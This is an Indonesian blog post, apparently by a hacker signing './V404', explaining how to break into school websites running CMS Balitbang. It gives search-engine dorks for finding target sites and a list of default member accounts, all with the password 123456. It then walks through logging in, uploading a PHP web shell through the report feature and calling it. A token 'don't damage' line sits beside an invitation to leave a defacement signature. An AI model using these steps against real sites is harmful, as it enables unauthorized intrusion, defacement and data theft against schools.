halooo ... malem2 gak bisa tidur nih..
buat tutorial aja deh :D hehehe
Kali ini saya akan bagikan cara hacking Domain sch.id ( wew ... web sekolahan tuh ) :P hehe
dengan menggunakan bug CMS balitbang :D
Langsung simak yaaa :D llallalaaaaaa.... :D
Dork in google :
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"
Dork in BING :
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
Dalam teknik ini, kita menggunakan default user dan pass member CMS Balitbang. hahaha :D
USERNAME | PASSWORD | DETAIL | SHELL UPLOAD |
alan | 123456 | Guru | Available |
kickdody | 123456 | Guru | Available |
siswanto | 123456 | Guru | Available |
choirulyogya | 123456 | Guru | Available |
wardjana | 123456 | Guru | Available |
taufik | 123456 | Guru | Available |
tomi | 123456 | Guru | Available |
alumni | 123456 | Siswa | Not Available |
070810120 | 123456 | Siswa | Not Available |
Data-Data di atas adalah default login member CMS Balitbang .... :P hhehe
langkah selanjutnya adalah...
Sign in / login member form,,, hahhaaha :D
http://sitekorban/member/
Isikan data yang kita dapat tadi untuk login ..
weww... kita berhasil login nih :D
hahhaaahaha kalau gak bisa berarti site target kamu udah di patch :P
Untuk mengupload SHELL
Klik SIM -> Data Laporan,
>kemudian tambahkan laporan, dari sini kita upload shell kita, (tuh sperti gambar di atas )
Untuk memanggil SHELL kita >> http://sitekorban/laporan/namashellkamu.php
lalu terserah deh mau di apakan nih web .. hihi
ini juga peringatan kecil untuk pengguna CMS Balitbang untuk mengetahui bug ini ..
Jangan Merusak yaaa :D sekedar Pengetahuan aja ..
tapi kalau igin test security biar di patch nitip nick yaa.. ./V404 hihihi :P
Sekian dari saya , terimakasih .. :)
I love Watanabe Mayu ( Mayuyu AKB 48 ) :*
Copas kasih Sumber ya .. hargailah Penulis :)Conten Creator : ./V404
update gan udah ga bisa
ReplyDelete